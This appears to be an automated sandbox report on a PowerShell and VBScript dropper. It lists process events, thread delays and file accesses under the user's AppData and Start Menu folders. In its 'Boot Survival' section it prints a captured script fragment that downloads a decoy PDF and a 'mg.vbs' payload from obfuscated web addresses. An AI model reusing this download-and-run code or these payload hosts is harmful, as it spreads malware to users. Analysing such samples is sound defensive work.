          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF887CE0D6C push eax; ret 3_2_00007FF887CE0D6D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF887CB54F3 push esi; retf 7_2_00007FF887CB54FA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF887CB5479 push esp; retf 7_2_00007FF887CB54F2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF887CB5479 push ebp; iretd 7_2_00007FF887CB5538
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF887CB9CB0 pushfd ; retf 7_2_00007FF887CB9CB2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF887CB569D push edi; retf 7_2_00007FF887CB5722
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF887CB09B9 push cs; retf 7_2_00007FF887CB0E12
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF887CB99F3 pushfd ; retf 7_2_00007FF887CB99FA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF887CB54FB push ebp; iretd 7_2_00007FF887CB5538

          Boot Survival

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htc5nwww.fornid.com/wh/List%20of%20rznvquirznvd%20itznvms%20and%20sznvrvicznvs.pdf';getit -fz $flol -oulv 'htc5nwww.pinznvapplznvtznvch.aznv/na/mg.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this mod

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4500
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5180
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4137
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5692
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5777
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3996
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 | Thread sleep time: -15679732462653109s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 | Thread sleep count: 4137 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 | Thread sleep count: 5692 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668 | Thread sleep time: -16602069666338586s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120 | Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
